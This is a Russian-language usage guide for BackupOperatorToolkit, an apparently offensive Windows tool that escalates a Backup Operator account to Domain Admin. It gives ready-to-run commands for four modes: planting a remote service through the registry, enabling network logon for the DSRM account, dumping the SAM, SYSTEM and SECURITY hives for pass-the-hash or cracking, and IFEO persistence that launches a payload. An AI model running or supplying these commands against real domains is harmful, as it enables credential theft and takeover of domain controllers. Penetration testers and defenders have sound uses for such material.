
Повышение привилегий от Backup Operator до Domain Admin с использованием четырёх техник: удаленное создание службы, манипуляция реестром DSRM, извлечение кустов SAM/SYSTEM и персистентность IFEO для бокового перемещения и повышения привилегий.
BackupOperatorToolkit (BOT) имеет 4 различных режима, которые позволяют повысить привилегии от Backup Operator до Domain Admin.
Используйте "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" перед запуском инструмента.
Режим SERVICE создает службу на удаленном хосте, которая будет выполнена при перезагрузке хоста.
Служба создается путем изменения удаленного реестра. Это возможно благодаря передаче значения "REG_OPTION_BACKUP_RESTORE" в функции RegOpenKeyExA и RegSetValueExA.
Невозможно выполнить службу немедленно, так как база данных диспетчера служб "SERVICES_ACTIVE_DATABASE" загружается в память при загрузке и может быть изменена только с правами локального администратора, которых у Backup Operator нет.
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

Режим DSRM устанавливает значение ключа реестра DsrmAdminLogonBehavior, расположенного в "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA", на 0, 1 или 2.
Установка значения 0 разрешает использование учетной записи DSRM только в режиме восстановления.
Установка значения 1 разрешает использование учетной записи DSRM, когда служба Directory Services остановлена и NTDS разблокирована.
Установка значения 2 разрешает использование учетной записи DSRM с сетевой аутентификацией, такой как WinRM.
Если использовался режим DUMP и учетная запись DSRM была взломана офлайн, установите значение 2 и войдите в контроллер домена с учетной записью DSRM, которая будет локальным администратором.
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

Режим DUMP дампит кусты SAM, SYSTEM и SECURITY в локальный путь на удаленном хосте или загружает файлы в сетевую папку.
После снятия дампов вы можете выполнить PtH с хэшем контроллера домена, взломать DSRM и включить сетевую аутентификацию или, возможно, аутентифицироваться с другой учетной записью, найденной в дампах. Учетные записи из других лесов могут храниться в этих файлах, я не уверен, почему, но это наблюдалось в заданиях с управляющими лесами.
Этот режим вдохновлен проектом BackupOperatorToDA.
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

Режим IFEO (Image File Execution Options) позволяет запускать приложение при завершении определенного процесса.
Это может предоставить оболочку до режима SERVICE в случае, если целевой хост интенсивно используется и редко перезагружается.
Исполняемый файл будет запущен как дочерний процесс WerFault.exe.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK



